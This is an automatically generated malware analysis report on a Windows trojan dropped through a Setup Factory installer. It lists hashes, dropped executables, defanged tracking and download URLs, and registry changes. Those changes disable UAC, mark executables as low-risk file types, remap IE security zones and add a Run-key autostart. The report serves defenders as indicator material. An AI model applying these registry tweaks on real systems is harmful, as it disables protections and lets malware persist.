Trojan.Win32.IEDummy_04840773f0

by malwarelabrobot on October 3rd, 2015 in Malware Descriptions.

Trojan.Win32.Agent.nesqxd (Kaspersky), Trojan.Win32.IEDummy.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 04840773f0cf023e525f5128055a30b4
SHA1: be54d58bc7e46840eff4bd67c68cb5ab2d3a22a2
SHA256: 95cf525b01940282512551069a1c8374c112fe25cc051fe29ced722ed2cd208c
SSDeep: 49152:fC2lJmXbj5DIwbQea1LPEyK7r385JD3d6cIWhW:fzlkbFDVrQMyOr3S3d6cLhW
Size: 1852073 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-02-09 23:57:00
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

HDplayer.exe:1052
wmic.exe:1220
pumssx.exe:544
oo2.exe:1836
%original file name%.exe:560

The Trojan injects its code into the following process(es):

irsetup.exe:432

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process HDplayer.exe:1052 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\oo2.exe (100548 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\oo2.zzz (19008 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx5.tmp\frghw.dll (4119 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\oo2.zzz (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx5.tmp\frghw.dll (0 bytes)

The process wmic.exe:1220 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\81443793891.txt (238 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\81443793891.txt (0 bytes)

The process oo2.exe:1836 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ui-bg_inset-hard_100_fcfdfd_1x100[1].png (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\jquery-ui.min[1].js (5827 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\DynamicOfferScreen[1].htm (1042 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\DynamicOfferScreen[2].htm (850 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ui-bg_gloss-wave_75_2191c0_500x100[1].png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\dc[1].js (1327 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\DynamicOfferScreen[1].htm (2083 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\jquery.min[1].js (3621 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\jquery-ui[1].css (33 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\81443793891.txt (0 bytes)

The process %original file name%.exe:560 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (1610 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (7972 bytes)

The process irsetup.exe:432 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%WinDir%\chromebrowser.exe (846182 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\HDplayer.exe (345689 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (1209 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pumssx.exe (20929 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\IRW1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IRW2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IRW3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (0 bytes)

Registry activity

The process HDplayer.exe:1052 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "94 94 E2 58 51 5A F3 B4 E0 59 A7 41 A1 18 E7 EA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process wmic.exe:1220 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "48 C1 05 16 E8 F9 63 58 44 BD C4 87 18 AB 73 13"

The process pumssx.exe:544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 0D DD 7C 56 7D A4 8D 1C E2 5D 89 E2 5B 17 B0"

[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"

The process oo2.exe:1836 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CC 7E 79 E5 C3 DE 80 E9 E9 4F 90 35 E5 C8 4F 93"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "66 4D 8A C3 93 A9 5C EB E7 FE 64 4E FF 81 E4 79"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\_ir_sf_temp_0\irsetup.exe,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\_ir_sf_temp_0]
"irsetup.exe" = "Setup Application"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process irsetup.exe:432 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"ConsentPromptBehaviorAdmin" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments]
"SaveZoneInformation" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "84 01 F6 59 AA 49 DB B5 45 0E 74 FB 1E CC 94 CD"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations]
"LowRiskFileTypes" = ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"chromebrowser" = "%WinDir%\chromebrowser.exe"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
732c70ddeb887e0eabb2a1bcb40c94f9 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\HDplayer.exe
9bdcf813d65265255b820bc7a704da3c c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe
c3f5f4a1fb69b5889f0bbb313cf6017f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll
8f629260f997770f000bcf2b486b2529 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\oo2.exe
92d51c335c32899f652f00bed8878d21 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\pumssx.exe
08353b27eff2b5b4123b0586a3029343 c:\WINDOWS\chromebrowser.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: Setup Factory Runtime
Product Version: 9.5.0.0
Legal Copyright: Setup Engine Copyright (c) 2004-2015 Indigo Rose Corporation
Legal Trademarks: Setup Factory is a trademark of Indigo Rose Corporation.
Original Filename: suf_launch.exe
Internal Name: suf_launch
File Version: 9.5.0.0
File Description: Setup Application
Comments: Created with Setup Factory
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 22296 22528 4.47735 c76b9ce587690b8a39ba7840b7dd540c
.rdata 28672 11906 12288 3.44864 e96aa4f970e6f6799910a72904df3100
.data 40960 6504 3072 1.79291 e504fdbba062ee9bbd9ac425a4f5c0f5
.rsrc 49152 48652 49152 3.97462 cfe9ed4ad5147724783c17eb8911696b
.reloc 98304 4242 4608 2.5731 a88bdb6f651ecf67b1b3db4a2866ea4e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://ul.to/uj6g51wd
hxxp://ul.to/file/uj6g51wd
hxxp://fra-7m19-stor01.uploaded.net/dl/eab67468-b301-4ba1-bc6a-21c9013f0cb1 81.171.103.39
hxxp://ul.to/pnkw58oz
hxxp://ul.to/file/pnkw58oz
hxxp://fra-7m16-stor04.uploaded.net/dl/7979023c-f144-46ae-93a8-d9ea51ff17e7
hxxp://ul.to/awtvmav8
hxxp://ul.to/file/awtvmav8
hxxp://am4-r1f9-stor08.uploaded.net/dl/0904ca6b-9076-4741-93df-df1abcd51616 81.171.112.176
hxxp://smartinstaller.elasticbeanstalk.com/Installer/Flow?pubid=935&distid=30060&productid=29271&subpubid=0&campaignid=0&networkid=&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:0C:29:FD:55:AD&netv=&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=&downloadtime=&clickid=&version=6.12
hxxp://smartinstaller.elasticbeanstalk.com/Installer/Flow?pubid=935&distid=30060&productid=29271&subpubid=0&campaignid=0&networkid=&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:0C:29:FD:55:AD&netv=&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=&downloadtime=&clickid=&version=6.12&nipids=&secondcall=1&reqid=345346313
hxxp://smartinstaller.elasticbeanstalk.com//offers/DynamicOfferScreen?offerid=5&distid=30060&leadp=29271&countryid=262&sysbit=32&imgurl=&dfb=0&hb=-1&isagg=1&version=6.12&external=0&
hxxp://stats.l.doubleclick.net/dc.js
hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/topLine.jpg
hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/topComp.png
hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/bgImg.jpg
hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/bodyImg.png
hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/bottomLine.jpg
hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/nextCase.jpg
hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/button_over.png
hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/button.png
hxxp://smartinstaller.elasticbeanstalk.com//offers/DynamicOfferScreen?offerid=2&distid=30060&leadp=29271&countryid=262&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&
hxxp://staticrevenyou.outbrowse.netdna-cdn.com/Files//Setup_product_29271.exe
hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/ui/css/start/jquery-ui-1.8.19.custom.css
hxxp://googleapis.l.google.com/ajax/libs/jqueryui/1.8/themes/start/jquery-ui.css
hxxp://googleapis.l.google.com/ajax/libs/jquery/1.5/jquery.min.js
hxxp://googleapis.l.google.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js
hxxp://googleapis.l.google.com/ajax/libs/jqueryui/1.8/themes/start/images/ui-bg_inset-hard_100_fcfdfd_1x100.png
hxxp://googleapis.l.google.com/ajax/libs/jqueryui/1.8/themes/start/images/ui-bg_gloss-wave_75_2191c0_500x100.png
hxxp://smartinstaller.elasticbeanstalk.com/Installer/Track?pubid=935&distid=30060&productid=29271&subpubid=0&campaignid=0&networkid=&reqid=345346313&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:0C:29:FD:55:AD&netv=&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=&downloadtime=&clickid=&status=0&installedid=29271&z=1&offerscreenid=&offerorder=1&downloadduration=7594&installduration=0&issecond=0
hxxp://smartinstaller.elasticbeanstalk.com/Installer/TrackFinish?reqid=345346313&x=y&clickid=
hxxp://smartinstaller.elasticbeanstalk.com//offers/DynamicOfferScreen?offerid=4&distid=30060&leadp=29271&countryid=262&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&
hxxp://smartinstaller.elasticbeanstalk.com/installer/thankyou?productid=29271&pubid=935&distid=30060&countryid=262&reqid=345346313&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0
hxxp://smartinstaller.elasticbeanstalk.com/installer/ThankYouInner?productid=29271&productname=Direct VLC
hxxp://stats.l.doubleclick.net/r/__utm.gif?utmwv=5.6.7dc&utms=1&utmn=257232512&utmhn=installer.ppdownload.com&utmcs=utf-8&utmsr=1276x846&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=11.6 r602&utmdt=Thank you for installing Direct VLC&utmhid=474060882&utmr=-&utmp=/installer/thankyou?productid=29271&pubid=935&distid=30060&countryid=262&reqid=345346313&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&utmht=1443793907848&utmac=UA-37348037-1&utmcc=__utma=81742934.1974052579.1443793908.1443793908.1443793908.1;+__utmz=81742934.1443793908.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmjid=1507817284&utmredir=3&utmu=qhAAAAAAAAAAAAAAAAAAAAAE~
hxxp://n20.adshostnet.com/js/show_ads.js 212.124.112.251
hxxp://n20.adshostnet.com/ads?v=1&key=6c2c19aff050b202bf7c7970cb59cde3&ch=&click=&tz=3&t=1443793908504&requestRef=http://installer.ppdownload.com/installer/thankyou?productid=29271&pubid=935&distid=30060&countryid=262&reqid=345346313&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&flashVer=11.6 r602&epom_width=1200&epom_height=1400&scrWidth=1276&scrHeight=846 212.124.112.251
hxxp://d2vubraihqcany.cloudfront.net/typ.png
hxxp://cast-prod-dlv-pull.ironsrc.netdna-cdn.com/scripts/1/adnl.min.js
hxxp://neu-cast-delivery1.cloudapp.net/api/vv/1?callback=cb_1443793908941&ts=1443793908941&sessionId=nMTAT&rfr=aHR0cDovL2luc3RhbGxlci5wcGRvd25sb2FkLmNvbS9pbnN0YWxsZXIvVGhhbmtZb3VJbm5lcj9wcm9kdWN0aWQ9MjkyNzEmcHJvZHVjdG5hbWU9RGlyZWN0IFZMQw==&siteId=463&aus=2835,1,0
hxxp://n20adshostnet.com/js/show_ads.js
hxxp://n20adshostnet.com/ads-sync.js?v=1&key=162e6f885a307ca57c54025fd012cc8c&ch=&click=&tz=3&t=1443793909269&flashVer=11.6 r602&scrWidth=1276&scrHeight=846&cIds=
hxxp://cast-prod-dlv-pull.ironsrc.netdna-cdn.com/images/f4a270d9-5612-43bd-b9bc-5d0e41fded55.gif
